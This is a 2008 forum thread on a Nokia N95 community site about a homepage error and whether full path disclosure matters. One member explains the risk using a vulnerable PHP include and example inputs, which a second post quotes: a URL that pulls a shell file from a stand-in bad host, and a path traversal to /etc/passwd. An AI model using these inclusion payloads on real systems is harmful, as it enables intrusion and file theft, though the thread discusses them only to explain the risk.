
07-09-2008, 12:38 PM
|
 |
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
|
|
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts
|
|
FAO Admin - Your Homepage Is DOWN!!!
Quote:
_COM_SEF_NOREAD <snip> )
_COM_SEF_CHK_PERMS
|
Found when going to Nokia N95 software, downloads, themes - Home
__________________
I've all the time in the world, but nothing very useful to say.
If you appreciate help from a member, then show it by clicking on the 'Thanks' button!!
Last edited by pseudofinn; 07-10-2008 at 10:02 PM..
Reason: snip, snip
|
|
The Following 3 Users Say Thank You to Steven_Smith For This Useful Post:
|
|

07-09-2008, 01:47 PM
|
 |
N95 Security
Phone: N95-1 v30 16GB(DNA) N95-2 v30(Vodafone) N95-2 v15(DNA) N81 8GB V11, N96-1 WOM trail, N82 Black V20
N-Gage ID: Mickyfin
|
|
Posts: 7,603
Thanks: 2,172
Thanked 1,897 Times in 1,211 Posts
|
|
|
Yep, getting the same here. I guess Brandon will sort it soon.
__________________
Click here for the Official Nokia Software Updater, which Now Supports **VISTA**
To find out your N95's Firmware version, key *#0000# into your phones key pad. The V##.#.### shown is your handsets current Firmware! Please enter these details along with N95 model into your profile. This provided information will help other members help you, should you have any problems, or questions with regards to your N95. Thank you.!
Wanted - Faulty N95 handsets. PM me if you have one you wish to part with.
|

07-09-2008, 04:17 PM
|
 |
N95Users Administrator
Phone: N95-3
N-Gage ID: None
|
|
Posts: 226
Thanks: 55
Thanked 132 Times in 53 Posts
|
|
|
Thanks guys, fixed.
__________________
 Always listening, never caring......
|

07-09-2008, 09:11 PM
|
 |
N95 User
Phone: N95-1 v21.0.016 (o2.co.uk)
|
|
Location: Alegedly I'm up my own arse
Posts: 365
Thanks: 23
Thanked 19 Times in 19 Posts
|
|
|
Yay full path disclosure ftw!
|

07-09-2008, 09:27 PM
|
 |
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
|
|
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts
|
|
|
Yeah, but you can not access it without admin rights so doesn't really matter.
|

07-10-2008, 09:09 AM
|
 |
N95 Guru
Phone: N95-1 v30.0.015, 5310 XpressMusic v5.81
N-Gage ID: Zii08
|
|
Posts: 1,434
Thanks: 120
Thanked 233 Times in 119 Posts
|
|
|
In the photo competition prize thread i was wonderign who was this "Generous Brandon". LOL It's so clear now!
__________________
Protect the environment, save the earth!
Check out my Flickr profile! and why not comment on my photos ;D
|

07-10-2008, 08:43 PM
|
 |
N95 User
Phone: N95-1 v21.0.016 (o2.co.uk)
|
|
Location: Alegedly I'm up my own arse
Posts: 365
Thanks: 23
Thanked 19 Times in 19 Posts
|
|
You seriously need to figure out what is a security risk and what isn't!
I mean now that a *malicious* user knows the path to the web root they, can look at ways to exploit the application layer (weakest part). If they can get a decent LFI they can access etc/passwd from there.
Full Path Disclosure = Bad
EDIT:
Thought I should clarify this a bit more.
Say there was some code that was poorly written like this:
Code:
include($HTTP_GET_VARS['a']);
Now in that page you could pass something like page.php?a=http://www.badsite.com/shell.txt or you could do index.php?a=../../../etc/passwd, now look at how simply that was done.
If I didn't have the full path disclosure, I wouldn't know how many directories down I need to go. I wouldn't know if it was a Windows/*nix box. Well not quite the OS, most boxes will tell you if you ask. Like this box runs FreeBSD 6.2.
Last edited by Rapid Dr3am; 07-10-2008 at 09:00 PM..
|
|
The Following User Says Thank You to Rapid Dr3am For This Useful Post:
|
|

07-11-2008, 12:44 AM
|
 |
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
|
|
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts
|
|
Quote:
Originally Posted by Rapid Dr3am
You seriously need to figure out what is a security risk and what isn't!
I mean now that a *malicious* user knows the path to the web root they, can look at ways to exploit the application layer (weakest part). If they can get a decent LFI they can access etc/passwd from there.
Full Path Disclosure = Bad
EDIT:
Thought I should clarify this a bit more.
Say there was some code that was poorly written like this:
Code:
include($HTTP_GET_VARS['a']);
Now in that page you could pass something like page.php?a=http://www.badsite.com/shell.txt or you could do index.php?a=../../../etc/passwd, now look at how simply that was done.
If I didn't have the full path disclosure, I wouldn't know how many directories down I need to go. I wouldn't know if it was a Windows/*nix box. Well not quite the OS, most boxes will tell you if you ask. Like this box runs FreeBSD 6.2.
|
God I would hate to be you! You must have so many enemies, why would anyone want to hack this forum? We don't hold any good information on our members, well nothing you can't already see.
Also most people have better things to do than find security holes in forums, for example the bloke who found the flaw in the DNS servers using cache poisoning, now that was something worth while.
__________________
I've all the time in the world, but nothing very useful to say.
If you appreciate help from a member, then show it by clicking on the 'Thanks' button!!
|

07-11-2008, 06:34 PM
|
 |
N95 User
Phone: N95-1 v21.0.016 (o2.co.uk)
|
|
Location: Alegedly I'm up my own arse
Posts: 365
Thanks: 23
Thanked 19 Times in 19 Posts
|
|
|
Did I say someone wanted to hack the forum? Oh wait it's a small forum so the server wouldn't be any use? I doubt someone would use it for Phishing or DDoS attacks. Maybe even just for lulz?
Also it's fora not forums, in the English language when you take a word that end UM like Forum or Agendum the plural becomes A making Agenda or Fora.
|

07-12-2008, 01:05 AM
|
 |
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
|
|
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts
|
|
|
No one is sad enough. And I am sure the forum is a lot more secure than you think.
__________________
I've all the time in the world, but nothing very useful to say.
If you appreciate help from a member, then show it by clicking on the 'Thanks' button!!
|
| Thread Tools |
|
|
| Display Modes |
Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT. The time now is 11:15 AM.
Style Developed by Andrew Slane
|